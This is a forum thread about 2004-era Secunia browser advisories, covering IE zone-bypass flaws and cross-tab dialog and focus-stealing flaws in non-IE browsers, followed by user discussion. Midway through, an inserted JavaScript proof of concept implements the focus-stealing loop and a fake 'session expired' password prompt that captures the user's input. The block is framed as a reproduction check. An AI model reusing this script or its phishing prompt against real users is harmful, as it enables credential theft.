PSA: More Browser Vulnerabilities (IE, Firefox, et al)

M11

Earlier today, security consulting firm Secunia released details of exploits affecting both IE and non-IE browsers. Many users of non-Microsoft browsers may have a false sense of security, and will want to pay extra attention to the threat affecting their browsers identified in this thread. Although this is not a code execution exploit, or something similar, it still is worth taking seriously.
IE:
Description:
http-equiv has discovered two vulnerabilities in Internet Explorer, which can be exploited by malicious people to compromise a user's system, link to local resources, and bypass a security feature in Microsoft Windows XP SP2.

1) Insufficient validation of drag and drop events from the "Internet" zone to local resources for valid images or media files with embedded HTML code. This can be exploited by e.g. a malicious web site to plant arbitrary HTML documents on a user's system, which may allow execution of arbitrary script code in the "Local Computer" zone.

This vulnerability is a variant of:
SA12321

NOTE: Microsoft Windows XP SP2 does not allow Active Scripting in the "Local Computer" zone.

2) A security zone restriction error, where an embedded HTML Help control on e.g. a malicious web site references a specially crafted index (.hhk) file, can execute local HTML documents.

NOTE: This will also bypass the "Local Computer" zone lockdown security feature in SP2.

The two vulnerabilities in combination with an inappropriate behaviour where the ActiveX Data Object (ADO) model can write arbitrary files can be exploited to compromise a user's system. This has been confirmed on a fully patched system with Internet Explorer 6.0 and Microsoft Windows XP SP2.

Solution:
Disable Active Scripting or use another product.
http://secunia.com/advisories/12889

Microsoft does not offer a fix for this yet.

Other Browsers:
Vulnerability "A"
It is possible for an inactive tab to spawn dialog boxes, e.g. the
JavaScript "Prompt" box or the "Download dialog" box, even if the user
is browsing/viewing a completely different web site in another tab.

The problem is that the browsers do not indicate which tab launched
the dialog boxes, which could therefore lead the user into disclosing
information to a malicious web site, or into downloading and running a
program which the user thought came from another, trusted web site,
e.g. their bank.
You may test the first vulnerability here
Vulnerability "B"
It is possible for an inactive tab to always gain focus on a form
field in the inactive tab, even if the user is browsing/viewing a
completely different web site in another tab.

This is escalated a bit by the fact that most people do not look at
the monitor while typing data into a form field, and therefore might
send data to the site in the inactive tab, instead of the
intended/viewed tab.

Here are the solutions for the above problems:
4) Solution

Mozilla:
Vulnerability "A":
Disable JavaScript or do not visit untrusted and trusted websites
at the same time.

Vulnerability "B":
Disable JavaScript or do not visit untrusted and trusted websites
at the same time.


Mozilla Firefox:
Vulnerability "A":
Disable JavaScript or do not visit untrusted and trusted websites
at the same time.

Vulnerability "B":
Disable JavaScript or do not visit untrusted and trusted websites
at the same time.


Camino:
Vulnerability "A":
Disable JavaScript or do not visit untrusted and trusted websites
at the same time.

Vulnerability "B":
Not affected by this vulnerability.


Opera:
Vulnerability "A":
Will be fixed in Opera 7.60.
Until Opera 7.60 becomes available, Opera Software will release an
advisory on this issue, which will be available on the Opera
website.

Vulnerability "B":
Not affected by this vulnerability.


Avant Browser:
Vulnerability "A":
Vulnerable. However, vendor never responded to inquiries.

Disable JavaScript or do not visit untrusted and trusted websites
at the same time.

Vulnerability "B":
Vulnerable. However, vendor never responded to inquiries.
Disable JavaScript or do not visit untrusted and trusted websites
at the same time.


Konqueror:
Vulnerability "A":
The Vendor reports that KDE version 3.3.1 fixes this
vulnerability.

Vulnerability "B":
Not affected by this vulnerability.


Netscape:
Vulnerability "A":
Vulnerable. However, vendor never responded to inquiries.
Disable JavaScript or do not visit untrusted and trusted websites
at the same time.

Vulnerability "B":
Vulnerable. However, vendor never responded to inquiries.
Disable JavaScript or do not visit untrusted and trusted websites
at the same time.


Maxthon:
Vulnerability "A":
Will be fixed in an upcoming version.
Disable JavaScript or do not visit untrusted and trusted websites
at the same time.

Vulnerability "B":
Will be fixed in next version.
Disable JavaScript or do not visit untrusted and trusted websites
at the same time.

http://secunia.com/secunia_research/2004-10/advisory

Browser manufacturers are currently preparing a bugfix for the non-IE exploit. In the meantime, Secunia recommends changing scripting preferences and habits to lessen the potential of becoming a victim. Currently no sites have been discovered using this, but some may soon. This second exploit is of special interest to identity thieves, who may fool a user into viewing his site at the same time as the user checks email/banks/visits paypal.

The non-IE browsers may be used in safety as long as secure websites are visited alone, as opposed to with other, possibly unsafe sites in the background. Simple Fix: Don't randomly browse the internet or look at porn while using a secure website. Case closed.
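The two non-IE issues quoted above are simple to reproduce from the attacker's side, and a reproduction is also the quickest way to check whether a particular browser build is affected. The script below is an added example written for this page; it is not from the Secunia advisory and not code posted by anyone in the thread. It is what a hostile page left open in a background tab would run: issue "A" is the delayed prompt(), issue "B" is the loop that keeps dragging keyboard focus into a field in the hidden tab. The element id "pw", the 100 ms and 15 s timings, the dialog wording and the stand-in document used when no DOM is present are all assumptions made for the example.

```javascript
// Added example for this thread (not the advisory's or the posters' code):
// the script a hostile page in a BACKGROUND tab would run to trigger the two
// cross-tab issues Secunia describes.
//   "A": raise a prompt() while the user is looking at another tab.
//   "B": keep pulling keyboard focus into a form field of this hidden tab.
// The functions take `win`/`doc` as parameters instead of touching the globals
// directly, so the same logic runs in a browser and, with the stand-in
// document at the bottom, under Node. All ids and timings are assumptions.

// Issue "B", one step: focus the field with id `fieldId`. Returns true if the
// document now reports that field as active, i.e. keystrokes would land here.
function stealFocus(doc, fieldId) {
  const field = doc.getElementById(fieldId);
  if (!field) return false;          // no such field: nothing to capture
  field.focus();
  return doc.activeElement === field;
}

// Issue "B", the loop: re-focus the field every `intervalMs` so the user
// cannot keep focus in the tab they are actually viewing. Returns the
// interval handle so the caller can stop it with win.clearInterval().
function startFocusSteal(win, doc, fieldId, intervalMs) {
  return win.setInterval(() => stealFocus(doc, fieldId), intervalMs);
}

// Issue "A": after `delayMs`, open a prompt whose text is written to look as
// if it came from the site in the other tab. `onAnswer` receives what the
// user typed, or null if they cancelled. Returns the timeout handle.
function delayedPrompt(win, message, delayMs, onAnswer) {
  return win.setTimeout(() => onAnswer(win.prompt(message)), delayMs);
}

// Stand-in document, constructed for running under Node where there is no
// DOM: one field with id "pw" whose focus() updates activeElement the way a
// browser does.
function makeStandInDocument() {
  const doc = { activeElement: null };
  const field = { id: 'pw', value: '', focus() { doc.activeElement = field; } };
  doc.getElementById = (id) => (id === 'pw' ? field : null);
  return doc;
}

// Browser entry point; skipped under Node.
// Assumed markup on the hostile page: <input id="pw" type="password">
if (typeof window !== 'undefined' && typeof document !== 'undefined') {
  startFocusSteal(window, document, 'pw', 100);
  delayedPrompt(
    window,
    'Your session has expired. Please re-enter your password:',
    15000,
    (answer) => { console.log('captured:', answer); } // a real attack would send this off-site
  );
}
```

To use it as a check, put the script in an HTML page containing a password field with id pw, open that page in one tab, switch to a second tab and type into a form there. If the characters turn up in the hidden tab's field, or the prompt appears over the second tab with nothing indicating which tab raised it, that build has the bug the advisory describes. Current browsers keep keyboard focus with the tab being viewed and make these dialogs tab-modal, so the reproduction should fail against them; the stand-in document only exists so the same functions can be exercised without a browser.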
 
M11 said:
Earlier today, security consulting firm Secunia released details of exploits affecting both IE and non-IE browsers. Many users of non-Microsoft browsers may have a false sense of security, and will want to pay extra attention to the threat affecting their browsers identified in this thread.

Lollerberries...
 
M11 said:
Simple Fix: Don't randomly browse the internet or look at porn while using a secure website. Case closed.
Yeah, I read the notes for these earlier and can't for the life of me figure out how a deliberate phishing scam could take advantage of it. It's a dumb-luck sort of exploit.

<cynicism>No doubt some people will trumpet it as evidence that everything but IE is hopelessly flawed, just like some post yesterday noting how malformed HTML could crash Mozilla</cynicism>
 
lomn75 said:
Yeah, I read the notes for these earlier and can't for the life of me figure out how a deliberate phishing scam could take advantage of it. It's a dumb-luck sort of exploit.
A site with a paypal donate link could get you to open a window to paypal...
lomn75 said:
<cynicism>No doubt some people will trumpet it as evidence that everything but IE is hopelessly flawed, just like some post yesterday noting how malformed HTML could crash Mozilla</cynicism>
IE and non-IE both contain flaws in this thread. I also hope that nobody derails it.
 
M11 said:
A site with a paypal donate link could get you to open a window to paypal....
I was going to say "but not in a tab" -- but I suppose some people are running SDI mode, which would open the tab. Makes sense now.
 